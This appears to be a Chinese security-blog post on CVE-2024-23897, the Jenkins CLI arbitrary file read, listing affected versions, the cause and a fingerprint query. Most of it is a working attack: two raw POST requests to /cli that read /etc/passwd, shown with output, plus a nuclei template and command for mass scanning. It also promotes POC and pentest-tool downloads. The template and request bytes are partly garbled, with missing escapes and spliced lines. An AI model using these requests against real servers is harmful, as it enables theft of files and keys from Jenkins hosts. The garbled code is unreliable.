免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
Jenkins CLI 任意文件读取漏洞
02
—
漏洞影响
影响版本
Jenkins weekly <= 2.441
Jenkins LTS <= 2.426.2
安全版本
Jenkins weekly 2.442
Jenkins LTS 2.426.3
03
—
漏洞描述
Jenkins是基于Java开发的一种持续集成工具。2024年1月25日,Jenkins 官方披露 CVE-2024-23897 Jenkins CLI 任意文件读取漏洞。Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,攻击者可利用相关特性读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合其他功能等可能导致任意代码执行。官方已发布安全更新修复该漏洞。Jenkins 官方评级严重。请 Jenkins 客户尽快升级。
04
—
header="X-Jenkins" || banner="X-Jenkins" || header="X-Hudson" || banner="X-Hudson" || header="X-Required-Permission: hudson.model.Hudson.Read" || banner="X-Required-Permission: hudson.model.Hudson.Read" || body="Jenkins-Agent-Protocols"
05
—
漏洞成因分析
命令行接口文件读取: Jenkins内置的命令行接口(CLI)存在一个特性,允许在命令参数中用@字符后跟文件路径来替换为文件内容。这导致攻击者能够读取Jenkins控制器文件系统上的任意文件。
权限绕过: 拥有Overal/Read权限的攻击者可以读取完整文件,而没有该权限的攻击者也可以读取部分文件内容。
使用POST请求/cli接口,且包体中含有help、who-am-i命令以及@文件名
这哥们讲的挺细致,感兴趣的可以看下
https://www.youtube.com/watch?v=UdsjR-pt5uw&t=492s06
—
漏洞复现
第一步,向靶场发送上传数据包,body是以/etc/passwd为例的,想换成其他文件自行转码即可,session为随机生成的字符串
POST /cli?remoting=false HTTP/1.1Host:Content-type: application/octet-streamSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92Side: uploadConnection: keep-aliveContent-Length: 163b'x00x00x00x06x00x00x04helpx00x00x00x0ex00x00x0c@/etc/passwdx00x00x00x05x02x00x03GBKx00x00x00x07x01x00x05en_USx00x00x00x00x03'
第二步,向靶场发送下载数据包
POST /cli?remoting=false HTTP/1.1Host:Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92downloadContent-Type: application/x-www-form-urlencodedContent-Length: 0
响应数据包如下
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinjava -jar jenkins-cli.jar help[COMMAND]Lists all the available commands or a detailed description of single command.COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
漏洞复现完成
07
—
批量漏洞扫描
nuclei poc文件内容如下
id: CVE-2024-23897info:name: Jenkins < 2.441 - Arbitrary File Readauthor: iamnoooob,rootxharsh,pdresearchseverity: criticaldescription: |Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.reference:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/metadata:verified: true: product:"Jenkins"product: jenkinsvendor: jenkinstags: cve,cve2024,lfi,rce,jenkinsvariables:payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"javascript:code: |let m = require('nuclei/net');let name=(Host.includes(':') ? Host : Host+":80");let conn,conn2;try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)}/cli?remoting=false HTTP/1.1rnHost:'+Host+'rnSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92rnSide: downloadrnContent-Type: application/x-www-form-urlencodedrnContent-Length: 0rnrn');try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)}/cli?remoting=false HTTP/1.1rnHost:'+Host+'rnContent-type: application/octet-streamrnSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92rnSide: uploadrnConnection: keep-alivernContent-Length: 163rnrn'+Body)resp = conn.RecvString(1000)args:Body: "{{payload}}"Host: "{{Hostname}}"matchers:type: dsldsl:'contains(response, "No such agent "")'extractors:type: regexgroup: 1regex:'b([a-z_][a-z0-9_-]{0,31}):x:'# digest: 4a0a0047304502202b2e82af6bbcaeab99c7fbc77eb54ae1ca27cb09ab6cec546d637b796940ee03022100b541c0a1bbd2daf0fedfbc957740578d5503a69375de87f40eeceaa3ca7690d9:922c64590222798bb761d5b6d8e72950
运行POC
nuclei.exe -l data/jenkins.txt -t mypoc/cve/CVE-2024-23897.yaml
08
—
修复建议
升级到安全版本。
09
—
资料领取
在文章底部点发消息发送关键字免费领取。
后台发送【电子书】关键字获取学习资料网盘地址
后台发送【POC】关键字获取POC网盘地址
后台发送【工具】获取渗透工具包
原文始发于微信公众号(AI与网安):CVE-2024-23897
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论